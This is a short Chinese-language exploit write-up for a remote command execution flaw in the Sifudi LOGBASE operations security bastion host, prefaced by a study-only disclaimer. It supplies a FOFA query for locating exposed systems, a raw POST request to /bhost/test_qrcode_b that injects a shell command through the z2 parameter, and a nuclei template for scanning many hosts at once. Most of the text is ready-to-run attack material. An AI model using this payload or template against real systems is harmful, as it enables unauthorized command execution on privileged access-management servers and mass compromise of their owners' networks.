免责声明:
本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
漏洞描述
思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞。
fofa语句
app="思福迪-LOGBASE"漏洞复现
打开页面
构造payload
POST /bhost/test_qrcode_b HTTP/1.1
Host: x.x.x.x
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: https://x.x.x.x/
z1=1&z2="|id;"&z3=bhostnuclei批量验证
id: LOGBASE-test_qrcode_b-rce
info:
name: 思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
author: changge
severity: info
description: 思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞。
metadata:
max-request: 3
fofa-query: app="思福迪-LOGBASE"
verified: true
reference:
- https://
tags: tags
http:
- raw:
- |-
POST /bhost/test_qrcode_b HTTP/1.1
Host: {{Hostname}}
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}
z1=1&z2="|id;"&z3=bhost
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code == 200 && contains(body,'uid')"